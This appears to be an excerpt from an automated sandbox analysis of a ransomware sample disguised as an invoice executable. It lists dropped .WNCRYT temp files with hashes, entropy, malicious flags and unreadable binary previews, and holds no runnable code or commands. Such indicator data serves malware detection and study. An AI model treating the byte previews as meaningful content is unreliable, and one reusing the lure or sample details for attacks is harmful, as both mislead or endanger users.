                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:...I#..>j.......]....U...t>....+....\7....Y_..... r.s.-.w...P......N....9 (.&...1...u..q=.JSud..M.......IH.$f-......W@. ..K.,B......f.o.ToE>..D....x.....kFp...=f......?`W.JDr......ny.]T...;L./&(.....%g...z*(.......5..."+.....Z=.Q......9.yf9..4.XH.t4.........-e2.|7..CT....e.6W..$.A..{x.>.:.....v.]ix....."k\.E..\..".c..5.sJ.6.......N.~.[RB#.2...V-...~$.....{......@Y..FWl.>.OSA...............CT....-...,.h.>Eo...+....h.Q..b..T.w;...?.oy..N?..3.n0..f.n)..D...^I.. .H..5.|f.t.p.G....%"....S..Er.<.R...f.z.....a..[......'..P...Q....6.8H.....!%8...@.........._"7v...}jb6...X.W....'...0.y...}.(.1..3r.tZ...y...Q-..[{K..=|.wa9<w"..).VU....hKk.z...*..J.........z.]3|...q]..Q....@...Z#...f..o.(.G.x."r......U.......m!..6.Y1tA..#W...w.5.........SG~u.Ra....5<...)..g+".....>H.......~.9..e.wDVqK+=B...z....t....>.?...3/rk....K.k.A..NR.]...J#...c..{e..(..G...v....2.a.d\.fR..1K....Pb49.....A.F....#.....i.;.d]c./......qY.vD'C..`8#..1r.\q...o..*"l2O..a.%h..\?.\..+..%..?

                                                          C:\Users\user\AppData\Local\Temp\11.WNCRYT (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):7.821409540539878
                                                          Encrypted:false
                                                          SSDEEP:24:TbyNh4ZVuFHONr1NjnhGBIKRolzqWSNk8QHTiIefsuBaDaq:PyNh4ZY1OP5hcoNBQXVIek/aq
                                                          MD5:C8B64E139DE03A2F68E7CBEF327279C4
                                                          SHA1:BFAD5B95802DB42536666DBA76147C1D612B1411
                                                          SHA-256:4935244D1EECC22D38DB289DCF7178A4E1A742BE06670D04965A1B86A7F3EC15
                                                          SHA-512:5B9E8253FA7C976A03370B332243D150B8B94AEA9A261FAC0482420BFE20E7BFF2E16A2DC66587F9F417FD1681F2E881CEF962A1AAA5DB6C3D2C63DF39AFE631
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:\.8^..X.l....~..Xi.Q.......s_...&l.........xc..DRPj...D.l.//r4.r...i.vs...9Oz.=..:$.....%.........G..j.._P....|..0E3......'..\"/*gZT..H=i.^P..mL!.H.,.[.t......z.zx...f1..U..s..T....4...c\,pd.!...$..(`.......~17AV....z.g..T..jf.B.e.s.+.!...*....,S..8..U...k.f...v...........j.'x..g........3.E.....z+.W..v..3.[.....u........5.^Q...L..|...c.N.....5...|...L..:.J.:..|..t.....N>._..|2X..;.......%]!J.........-..2....EA=..M7..K..d.7.?W.w.qVv.AB...q.G...`..R..|.i:Z..^.].....<.q..\)...f.P..X.f/R...n........ty.T.H... .P....$.M....d..["..i3<.&....53.!.2...&...p..A...1,.xt.y..8z.J...>6..v^....g..|..%.qy)i.t.l.Eu.{...-.6..X......Fyt.[...d;.Uq$.|tp.H.0...7n9,?....u. .|...E.1.V....;.-..v......(W^c..s.'.t.A.....)..&JK.|q.h]V.}....PC..En. ..DvD.....m1.=Fdr...d~@....7.Fh.9..8.K.\...e...O...\........+....Hy.c%.yp].m.......},.f..A.K..,-.}.i.=@#...i....L.....<s...v.../..._&..2..a.....#Ta....W...80.2...W.q.e^...oQ.A.....N..M.b.nSFRXH..if.Ih..K.V.....]:.....!a

                                                          C:\Users\user\AppData\Local\Temp\12.WNCRYT (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):7.819869068167296
                                                          Encrypted:false
                                                          SSDEEP:24:cTdUc4cSRMZYqg2L286JXSTwrzsD3wttRNHlXVkNd:cTdU/b2L286jMktPNHlXVkj
                                                          MD5:8E79C756E83271D1035B5B44D69DBC15
                                                          SHA1:F92BE20EFC2DB0D62F83C8AB9A96B285B5EC5A59
                                                          SHA-256:D9CFC761CC944FC19F5DB50B12A968338A07EA0F1248AA2C0DEFCAFBA82EA6FF
                                                          SHA-512:26C3E3E7F7285EA61DDF51D5BFBB7D36098980CD9FB7CA91BBF60AC1B580A3B914E7E7B9A739D9AD4B3C2E80B654DA48DD23E4FE22F0C2D38D4281D40BDAC5A8
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:...r..I..-..3+.....9..o..X..X~....;....).&.........lPd..O.f.^j..w.-.C..T.65\.s.1..!..#......D..c...>...J.v....4..3....k....8K... ....N........H.^K.......dye..L.a.U=..8F....C.....y..*.3\....gS....+.86...e........Y.Q.M,.K....6.O.D...W.F(.z....G.%-!yn..._6.!G....N8............e.&.....m..1T.8._....oK.....{......h...N;.3c/.p..M^..8.lV.D...."hg..Z..s..H..s....C[.@Sp_Pr.;!.H.a..nw.Vr.q.-...6.5..Y......Q...y|P.W..R..;[.B5D...]|.^R...Y.I..O2.).*......q...,|.t.co..U!;=.Z.>.0T..............d....7M..x..!.b..3;..H..E....!...`..[...1.L.:...a..\...6.%..VD...{.uJ...R...q...E...Q.....EH.t.../{.......&...M..N...l.{.'=.v....)..-.*...y..|[0..... ..+#....?:..B&.;.g>...1...!@.cFcJ.pbR..3?:c...$...?>..;q:C..Z.E`S$p..Cm2..?..zo...(.|..E.d.]....c.:.y...&..4..]vV..Q?..>Hbz..K.......zh..DEQ.6....y.......1$..2K/.d..l.%..........X...nY.....yu...,.}.@.+...K.....7..v.....:$-....@....fK..f.e..Zi5..ea...^..ZNyq.\h.N+.g.V.N<.7*.._0.r..#S....\....L....$..4xp.|..2.

                                                          C:\Users\user\AppData\Local\Temp\13.WNCRYT (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):7.79742894563415
                                                          Encrypted:false
                                                          SSDEEP:24:D7/raSfcNXaW7KKC+7XLzxMcGTRDgvtdpNuE0gyP:D7jR+XanKbzx8RDgFvT/c
                                                          MD5:E9975251F6A35CFA326D586A3ABC8723
                                                          SHA1:4FD84337EE6B15DD48F6B8ECEDB4F3E906BA6DC8
                                                          SHA-256:8B4DEB46C659E5DD2485A2A2A65810FB72FDB303677AD9980D560609700BF274
                                                          SHA-512:470162D1E875F45F99A1A0BABEA28B6211ED47488C54693E6E7D5A8A4B0A092ECC66159ADAD731037A00B1BDC00F453E481DA735601CCC5F18CC2C7D7E30936B
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:.E...........=.........5Vo.u.0..W#..$.w.7$fJ.Z..*O.[j..J.%....c.#...&..r...L.n.fU.....^E'.~ahGE....D .h..U... .a.6FYG.!v:..}..A0Os.&x.....nb..o.M.A.0)...s|AK.5X>>.\......j.0.s.o.L.N..8..l..D.......C..<A8N..#.tt.....D....f..b.=9...lh>...,.wk.._O.......x.V"4&..$M\.....i...w...$.t...d._..y].5.B.{....k....X.....oI..Kg]+..N4..........MY.2....;R...."...!..&o.,..es!......Eu.....9...4...+>.).*JL...i..-6.vS.............M..Z.....~..'...HY.....C....d..s.K.....]..?.....p..^..&.......2.........E]p.H6.O......gky.!.].@.......H.w..+.M..M...i.U.).........l6Ve.G2"+.Z.....Z...9w^.P)..{!.!G....5.w...z...(.m.ap:.......E..m.g^.6#~.E>......I...t.._.YUE...I........N...8....E...N$j..,m.Y'.g.%$o...+Vsr..Kj....]..7.ak*..]3i0d5.Gn%.BY..?RZ.MPux..,.>.B.f..k.ld.../.Gi.0..........k...{.?....^..&X5..1.Y..n23T.]G...,.6X...-o.(i6.I.uJ..J..z(....qJ..%..4./......=.......H..8+A....|.Z+.I.&...?..2.IE.w.N..\..|m<.d.zv....0..N...v*.H..+o..9u..`?.D'........U...-.G.j.*.EE.

                                                          C:\Users\user\AppData\Local\Temp\14.WNCRYT (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):7.828129222117002
                                                          Encrypted:false
                                                          SSDEEP:24:PaTqBUY+nmh4MALM0MWLRodNqNWM4ywdNU4yyzRVvUbapkqN:SgFh4MAVp+ncWMxcNfysXN
                                                          MD5:054E23C1349999421768276E230B1AA1
                                                          SHA1:A21C992FA3B04B6A3F864B1FCB10B875D2C216F6
                                                          SHA-256:0FCC4BC9102175D067051D2F2A8837FB29F3BF4D79C828D46D9BA1D067C83756
                                                          SHA-512:4E602E6A37CF40DB2B5D1FE408B6FA46020E528B8088388F8ECC540C35614426C8715A14D5060AAD8868945409BD25EB7F29EC93470DC99155EC22C437C229BB
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:G@...4.u.....-.;.'".....tX...,).p........?&........]4....xB..m.{0.[...w.7{........(........)..>....<w}....V.h......;.s0p...........@.<"{.\=B.5...t.'T.]G{.......s/.v......D.......WvK..0....:..w....k...U..=....0.]rU....0|......f....F .E@....[....#M.t.:.F84...X...bNq...!x....\..#.3.m.-...A"w..w~im....-.......E.s...\|D.;...6L....9F..X.S.]C..E...F......n......a.j).....g,..U.L.a.r..i..".....Gf..p8F&..^..f.g....A.y../W.B.;..j../..%............i...nn...4...>..c.L.y............Y:.:Z.`gE...(..h=..^?TH.9pO....}...0F,.9.5sd..7~.D.A..ac..j._.gg...`...I....g.?..ltZ........c!....;.|....6J.x.p..\.qZ.6.....(<..j...a.R..?.)QD.|m..%p..0...'....].K.l.a..9.X.X..u.I..f..^... `.1=....5.|....u.5.Z..`.b.*az.q./.p.s.M;..<...M..8...:.... ..e.G...A...;.M.>.?|_..P.[]Ri.Bp+B.G(....Ku0...X...]I..!g...1.%..U.....J......=d...?..whs..r....M.B-.g!.[..G.n$}.X."..8{z.H...*.+...._.......[HL..v..~../N,'...mV....."..* T.R.R6.wD.....tkZ..R....w\./.;..J_lN.e..6....

                                                          C:\Users\user\AppData\Local\Temp\15.WNCRYT (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):7.800170893089835
                                                          Encrypted:false
                                                          SSDEEP:24:81Q8sVkZB5Vz5pCHarB1HfwkOnARJYAacvcebw3y4:4865VzrCKokOn/AacU+gy4
                                                          MD5:2C3442A044ED4AA75DC7924D86A37B75
                                                          SHA1:2A6BBF1213535BED1A8E986472BA262B571C7363
                                                          SHA-256:084D86FFB46B1E141D373F3BFF0892AA8A748E6E4A8EA05A513075B7D17DE86A
                                                          SHA-512:2D1024D0D5EA482764F30B9F52D3A570A455FA3C2D779FD0A1F84DF18EE3F193742302919E539C3F3D39E3F0FE6D1A6B35CBA43D47716D24E7DC5ABD98885646
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:..Y#.U.rX.8....02.,....$...2......j...J..+....I..iF..uR.....g,../...{...yu..s. ..m..e.[..e....:.~{w"....d.....223.O/.......(g.Z_..]...*B..T.]....:.t...fg.S.e1&..*.y.5.${.m.......cj.n...A.v%..B.9..'^-...M.,...n.8.n.8...MN..........^..m.E....;.....#....~.....ju..#.|)x3v.@...[..=zY....n.C#E.1.62.b.S_.....-/..8X....W.v.G..pB.O7..iB8..w._..y? ..b....,..w..]Im.[.<.'`.Z*j...#J.. .z] .z-.^.]K...Pq...n......2e.6.u...\z6..*\t.B.^^%........)+q.F9..*I]d..sS..A........[".lls.=......P......o,.<.N_,..(...8M....0n#UZ..B.48^8.&g.^..>1..-.)..N...W.s}..#../..}..f. ..k.l.g.....Q..`.[..)...~4T./...3FoK.......e....5.y.).;.)c............j.+....g.u...u!t..U..6.;...[%U.8N..8.].}......G....-.t.OF..t2G..esB....%...u.....*...i..UE.d.fi.V.K.~......Ys...O;*.sE.L.g-...y..+.`..^...o....S.p..Q.R'...+.Ar..A.ji8.....!........]$iKo..d,...x.... .6.c.i...#.R....O.o...M..p..Q..}........\...g...CX.G..o...{.Ap..HcQ...6..............7..H.h.u<.4i(.\..Po.....[..~..H

                                                          C:\Users\user\AppData\Local\Temp\16.WNCRYT (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):7.804696797628274
                                                          Encrypted:false
                                                          SSDEEP:24:a0YYmCyOPbpclRtwpONVYmc9HMJfzqytSuMKOQB6CRl/yDXKTUGdk:OYV3PbClRtCiVcBMRzqykuMKOUR5yqUJ
                                                          MD5:DE6900311FB992C4DEE5502D3AAB75D1
                                                          SHA1:281EA8D8703692EF9683DD4635C2EB3062BBD2B7
                                                          SHA-256:D4F11203FC611B85A2118329F82E27C290A9B6348AC32D42845F195EA339BF42
                                                          SHA-512:3C661B75F6659124B8C5E6E9EFDFB1DA8DABD89B5D5E43C27CC7B9B47C1194AAC57790A7A17A77012548D0F701C8DD7696AE94D7D00FF30B5DB7090BE403D05F
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:...z.b8Hz.Q.s}...Rm...yR..G....8..3.A[.....:@.}@!..r..`.Wh&<i.h?.P.Lj..q...P..y`...Z..$`.cl...m%@...'..t40.0G.@.......s..S#..`.K....G..NM.J...f..uO.....h....W.l..3..h.s.M.".v].n.'Z....@..&..BM.F..i.(...{4,........f..6}..;w<W..Q...s..[..F..b.......`..#./.-W.........B..;G.;.......I.?1...ZU......C.[...=?(.+ks.7K..9..q!$r..vp|1.f....,..y..[.g.m....._..B....G3N CB....d..S.wb.`d.4!U*jP.,..3.....gA.....+...d....9.M..h9..n..l.^.c>.G.\]..c.M....}.))W..'"-.|]>q...Gp.THS.....$c.i!..|.|._.X|....a......f.l.}..uA.J.@.|....*...}vZ.o..HA..#g1..Z...zM..{...-.........o....U..r.}....7....JN.......]...qw).....`.Y|....).7.a.......+.t..@|.....5k..~...6B..[.z.1.`.P>....s...|.4......DsbX..J..j7.....1m%..I...=.np...d.-..7..!...2.Qy..t.9.(-.....g.'3....P..h...Ld.H;S.pd..Q*.zic\^v...i......DE...)*.G.Oo....@..<.7_o.....g.$".f..l...c.....u.".@g.........[k.yu...{A..".... ~-.e.3t;..j.I..7.Q.......e.k....6..Y...^.b.......bd..ny..{.....4.=.;q.mg.U.3.Y.....

                                                          C:\Users\user\AppData\Local\Temp\17.WNCRYT (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):7.799256142770332
                                                          Encrypted:false
                                                          SSDEEP:24:0kWuY2ybj8Y3DOmGr1hUWQc6z80pFy5JAJ/B04dgcxbGNX:7Wd2ybgY39Gr1hVQc6z80rH5LmXX
                                                          MD5:D60D2F2C620165F621033B8BC6971117
                                                          SHA1:C60EF1D039A4CE047D1B1F9F6FC664B32C24E6EA
                                                          SHA-256:AE71F895DA3E7E44779B9EB73F5A7F204DDF6578D91D7032817E059EE581DACF
                                                          SHA-512:AFDB580D4B694EE6E5C60A2B623860F40BEA2F6FFDFBCE6D54F666A9A3BB702A1882DF434AB85280653EDE0943D3F4BDCB32FF554D38003314E0ABCA88E2DB70
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:._..R...Co.^..H...-......o..q...,#..<$.z.c..`F?..}O...U<.0qV.5....=.........#......j.0.. ..g4PE...)X..cMC8..E..9}.s .*o;...G...-.........Y|P..PG.....M8A_g.X..X.`.f........(..i7.....L.h. '._". .Z......P...l<.!..."..0_.T?C4../vjEH..`.I./5....b2Su....%..`.e...C.'..10~.1...b.t...l.<UT...!`L.9..c.K...0.X....i..52....3=....X.......2.#azDH..aV..4.mk(........JZ.W....@>.Z..Q...poH.3....e.5,.....As...].... ..$>...6; 9.,b.T.)..:u@.6Ym."..mm.W.....>.&B..I....]..o...h.%....g...L.1_...0. .....k.[^...n...q..>.,..x..........4[.....[-......w..r...Y.<S8........x9u.....[.h.bK....-..u.^.U1.H./k.g.j.d..S. ..VI......R.U.P.T.SIk.oA........v....8).!y....[...o...,.../..p.\.+..H4..K.....eI.....PQl, J.u.},.....>8.&/f.7..P.[..).j.#......7w.*4...V.R.K./..d."d]vZ-.cW............*.K....Y.....7...#;......cjH..#.!.-<....eF..`wmDV..h..M...Q..^j.....*2......=O.T)?.T.Qi...4.<.~.p.F....o`..IT.....'~..R*v.,.....,..^L.I.C.P.<VZ.4x~,.!.I...W. .!.~>.q.G4..|.X...0q7......0.x.;.

                                                          C:\Users\user\AppData\Local\Temp\18.WNCRYT (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):7.81091196419637
                                                          Encrypted:false
                                                          SSDEEP:24:Uwpprt1zcjKaUJm2DC1FjrC2STS/fbPMPSQcwl5nP1tqQ:LnXzcjKZJCjrkW/Thcl5nOQ
                                                          MD5:7CAD906B0D5397918D3AB4D24830FD1D
                                                          SHA1:6C424B4D3DC3034ABA5D009DCD7684560878268A
                                                          SHA-256:F018225FE533F712CECBE76AC1ACBC7700E9EFECF70E51A468B633B00B2DA030
                                                          SHA-512:4A53E3B1E043430BD567D00980F9A6E9B59B0C6F8D5DA3357A4132971D376767660CD6D9803634F1C9E1900AFA3BABFFCF03D13C7F8C6E865D4580C8122315B6
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:y.._=k..Ng!X..-.B.gV...c'..2V.]..!.j...5.Y.^.}....A.n..5...R,Ty%G..\......8T.f...O......M.,..)..aG.....|_.?b..5Fhm....0..9.h....". ..}..R.S.f$p....?....Pb.Z...l.B{.2...w.^..v..~.W.Ai?Pfa>.#<.X..S.$o....#._,6~..+.6.=.T.k.<,..:.....]a..V.g..U...VZ.+....ak.....&.A....LV..?..?cU.....9Ze:.....&.....bH.!?..c.h).....8..M....n.......$....2v.......n.u..B...z.<.mPm.C....q\...f.yN0..p7.RF.@.d0.i.|.-...Zj....Q.T...... ..y..._.8.-/..3....%...*....1......DO7......<5b...VH.+.).,.CCK.Fw.Iz...W.C..u...../}.....).......'.N..`..o..}L...$..........$....D.....>.KQ......u.........*<...L.r...V.......u/............#s..P..n..&R.A.gp..I......x.....Z:|.].g8.(..l.sT.?..SB.......#.K........`.)..h6.T."..L..&.4,.09.&.%Gn....Q~....0.?).5}h.p.v...+..oW.x....>b\..^.L..+c.7Qcx..I)...).&..S%+..|J..r:........J.+..=8%@........O.A...55..:6.. .@...@..].,..3..G.....k....D@P...... k&x09g.4c.^s35..9.......V...9gaU.^...&....k.&.3..hO....8.'..5..w.hi..{e.Y.fw.....c]N.B.G). ..

                                                          C:\Users\user\AppData\Local\Temp\19.WNCRYT (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):3481559
                                                          Entropy (8bit):7.999312423782288
                                                          Encrypted:true
                                                          SSDEEP:49152:jymCheymCheymCheymCheymCheymCheymCheymCheymCheymCheymCheymCheymG:+RHRHRHRHRHRHRHRHRHRHRHRHRH9
                                                          MD5:49B0330BEA9FA76157EA17D10930F2B6
                                                          SHA1:7C9D77094744DEEB044BBC70266C3018AE90CF6B
                                                          SHA-256:2F4B69E9EDB6CDC88EF78E5511C251F98AA2188FCB334F65C27B543FE464D253
                                                          SHA-512:E83A091BD2F35E1ACC68F4A499F6D4D617ED58C6BF6BE91622F74F9397675FE4F85579FF53B28C9723C0150631821F8B2BC50B3E6C71CE36098CA778E858C33B
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:.. .......p..]..;.|X.....}...[...Rq..$>..|`...8..98..%ss`3;.j/d.j ...<.p..QM4........qs.z.SE...zc..."4.....e.."..}.uq)..]L..Z\.(.M..\....y#.nIT,.l.....]N.z.4^....~D.....l/%....,mj..6/....X.O$...........3^eZ^%.8..>y....4..9.8.VNF......e.!..*.... ..2}.....)..q.Kv5.<....t..AW..1....9Q.KL.|.....L...?.....@.;...A..*.7...Gkop3..i.....n.}.?.....#.._......&.I.Y...#.x...........a.B...z...gF...)..(.o>V.H.../f....y..........E..b..+.r#Q_....5..M......T=.....1.wb.:.8+...D........x.Q..F.P...p..S.\u".+;(}_...)VM.x*...X..r..z...&R]..{*.vZ.pa......G.\....d5....vVJ..QB..s.m...!+.].0.x..(.;.*..<...j. ..tQ.r......J..../(0rr=....)..p..!.B.f.lm..I?..pT.'...*$=.......G.1.%..&.S.....I.9.4.o.......P../s..c.3i.2...UlLC.eM....j..*8g..-8M.s.-bSd..}...o.u..*.zv.$.TC...]>.......y.V.y......O}...A.$C.VZ`.p...M..R....N".(~Z..~t5......-...+..hm..fQ.....mcW..O~h3...J..!O..3R..`!Es...J.l"9.x.o...3.f.a.n.....C.v.Z.......:[.....2..h....0E i...O}.>."u.........V.Fi.......

                                                          C:\Users\user\AppData\Local\Temp\2.WNCRYT (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):7.791694000979164
                                                          Encrypted:false
                                                          SSDEEP:24:Gvo2sPGUIVL5vgre/826KYJx7pE4sCQD+XWR/X3cKn/wLmsN9+TY:GvoPGd5IS5YJDQaXa3cswX9SY
                                                          MD5:8C699AE84923B9CED1B0F4EA0E538450
                                                          SHA1:5012063E03E46C6C00EA33A74E2AF46FD65CF555
                                                          SHA-256:2E4AEA52093E5FEDFCB7A62D470E84E019E9F0AB5CA576717AFE95318CDDF5EC
                                                          SHA-512:267FF2ADA241A9DE075CD5FA4A092EDA4872ADA9059F765CC255A7AB17C44C9D98CAA8243CA37D616DBB0EE7B12330112B31C225ABF8B700B1A153D2CD938320
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:...C.p.t...3^n-.^X.<..M...'.@.!..j..Z-....0.0...m~?..)..Fc..?.)N.M..u.U..m$.`.k.".I)...E...Lh...{.0.4...b%.e.)........qe.]...!g..)E....Q.N..>.y....2....x..f....Y.:..wr.G.`..:..N..5....b..H..f@.z.34..........(V.._.t.jW.....G..3u....X:..rg.....nn.^.,...b...c.;...P]...,B..I.W....../.X.......G5.b3.....Zt.@.....Z....~.......q...O...*.mY.....^......UO.h.4...<.~.)[...Ij*.....9."..^.4.\.].....I]..............B.$.FC......BG..K....q.,..4.-.....#.. l..)....5.9....B^..f..a...`/...k..0.~..9..o. #.....QW*..a..|....7@.".f.......I,$'.5>n.f.......O..5. fl.....0L...O...Sd7D.O.....=t.Smj5.N._..d.K....w"..Rm.....[n.Ab.[ka...[..FV..O........*.5.....M...[...i.t&.{...\g#..L.z.H;..J.l..x. u...~P.J.'.m.Y./.....w$l....cv%...A.l..o..^P..W\.F.cX...y{..i4..)5275(...6t....).W.O.\.:..@..c.n..F.."i6i...x.._. .L_r.ya...#.....W:.m....N...Z[......^.S..u.C.-..1..c....;.G...v4E.).*.....Z*Z.#.>.....\.@Tp.C[...2y\M.f.........QC`...+v...v..^......^CZ.........h<..{-y...K..3...Q..

                                                          C:\Users\user\AppData\Local\Temp\20.WNCRYT (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):3482858
                                                          Entropy (8bit):7.99937050113591
                                                          Encrypted:true
                                                          SSDEEP:49152:8SQeqSQeqSQeqSQeqSQeqSQeqSQeqSQeqSQeqSQeqSQeqSQeqSQel:T
                                                          MD5:BF9DEF5B84E6E02842CCD723DF557D3F
                                                          SHA1:686EF48213DA663416924DF6A5DACE96512F5AF7
                                                          SHA-256:300D4941CABBDEDAF918D1910A47E98CD73419958C7DBAEE0AC671326E738779
                                                          SHA-512:96B4156B94C9234EFA7058A83FBE653722C384D6036AA98FD5D89A1C3C4884A810C9349DD088103965360E98B8B6BE89DCEA04549CB7EACCC4FE3C669A07BBC6
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:H.'.b.l....^67... .G\?k...N..>.o+..S..~...QZ2.1.l..2FRJ...`.}..........@...P....5....Z1.B.o.g'\..M.1/.8j..j^.a.V.....r.Xp......|.M'g..c.....W..."..b..I.:*.q4zP.9{.C.._.....>..i..\..Y...AW...C.D...y.Pm.....Xj+..j..[j..I...2WfS.xX.. rA...........\..DQ..bC....~.].&u...L._.<*......f...Sl:..!...2b.Z..%..Y?K......$.5O*..y`...9.&.u.$m~C3[+.$.Y.h...9..o<..W..p........s}....U....eS:......g.5.T..!....s.E\...|...D@|L...h.to@...C...5.SS.G0j.f.W...m....V.....[7..$.5....R...pLK..tmA.....v.R=G)15.l&O...;.6T.?....^.J...+U4`..N........U.KG..6%,9...4ZL...S6......D.{..3....g............D..@...ghm.&.. ...?.k.3..|{e6..Q....^.0....W(>..g.[..r..WI.z{..5\s.#....*....8...../.V.EZ..S.......o..r!...98...H...5Vqs.)>...9.xK([..=...."Ld....P..=....R..zM7....f|..i...Q..g.M..........n~.....)......@.<..=.oo'.............i..a....9y..s.v..mq.`..b7..<..*C].b...0.H.._..EUx..'..t..LA.....Z.....L....9.?...u.9.v[>f..7x.2.U.%p....}..'..u...........b..v..:..7..}.B.CAr.Y[.#.;{

                                                          C:\Users\user\AppData\Local\Temp\21.WNCRYT (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):7.795629897227125
                                                          Encrypted:false
                                                          SSDEEP:24:mBPuSe4xfImfpD8KUkTqjlrQZQGYeefH4y/j8stblt3Z9tsa:GE4xfImfpDJDslEZxYecH4tiblpTma
                                                          MD5:01930BD93418A4F570282A35A2818A69
                                                          SHA1:F18EFD623DC4CCF8A012F6C80D7DC364CF90A93E
                                                          SHA-256:07B804492A590F59B714B471FC5264752FE6299B1CBEC1AC8D8C7292EA9E98FE
                                                          SHA-512:8BD03432726B339FC6E31F084D2A72381D9C3EE45785E5796290C43AD310E8D34526627EBA53ED1C4519B14D6D73FF70928DFFAE158FA29F2D0D9F83C6867BBD
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:........O...._.NE.z..;./..............X..\.w.u..*...R.H...%d.>.C..8...f2........9..%z.y...h..=.*Fc).-w^.$F\..-.f.....L:.O1. ..C.@+...}.c....p)`.@....Q.$....'...qw...mr*..z.U..[...........4\.....unD.. @....a..u.A........w......$.:..bZh..`S.gp...R$.......R........v.=.n.,^.Sa..w.........$A.).../.<..=k^.8.<...'..%.".|.E...e.BC...b.]...s....*....P...j...{9.9g..(1.lm.sVa.......u./....[..(.........x.....}......q0=e..H(...`.m .v}..,...Q...........^....f...l..*..O4/8<$o.&g....P.,.ar..H.'l..r.52.Jk->..%!.i.Y.....X.o_.9N.9.....)Or0....jOy.L.rA..\.%....W'..O..o..k){.+.Rp..a.3................0O`..3/.....Czd..".b..g..`...V..Yc..0t...`Ey..c.xz!....77A.....e.............`HR.*..f_c.6.....!.e.t........l~.z,.k. .N...y..M.L._..".1....<.q{.......lh.Vt......p...A2.*j..1.}d*..\..+>....p.U.K.....O.."/..|.=.....'.|,../.%..H....*#.Dk.C(.sQ."|....u.u.. }....N. ..`.o.;..8..l.H.-Q/.z....q....?]|..?..{<.......?A......-q?sC.j..>.X4..v.......v.....I.Y..w......

                                                          C:\Users\user\AppData\Local\Temp\22.WNCRYT (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):7.800194796026652
                                                          Encrypted:false
                                                          SSDEEP:24:htgX1RXNeSakqjsdappBUR+5C/4nU8esUGkgVLYH:htgX1RXNeSakqBv5JU8lJkgVLYH
                                                          MD5:1129E048FC35FFE9B7B870571728DC81
                                                          SHA1:0373BABB82E142474693B06AD6905C51A10DE886
                                                          SHA-256:2E67065A23B2FC2714D8068559AC9B7534D4F3AA241EF1E00FCDE859D4951BEB
                                                          SHA-512:F73846F0019B360743070439C196B86438121581777E36EBA44033CCC63B12C1E7B13367E56AE26E2323F66540797AB6285E7F609E094326CDCB50831B51D4C3
                                                          Malicious:false
                                                          Reputation:unknown
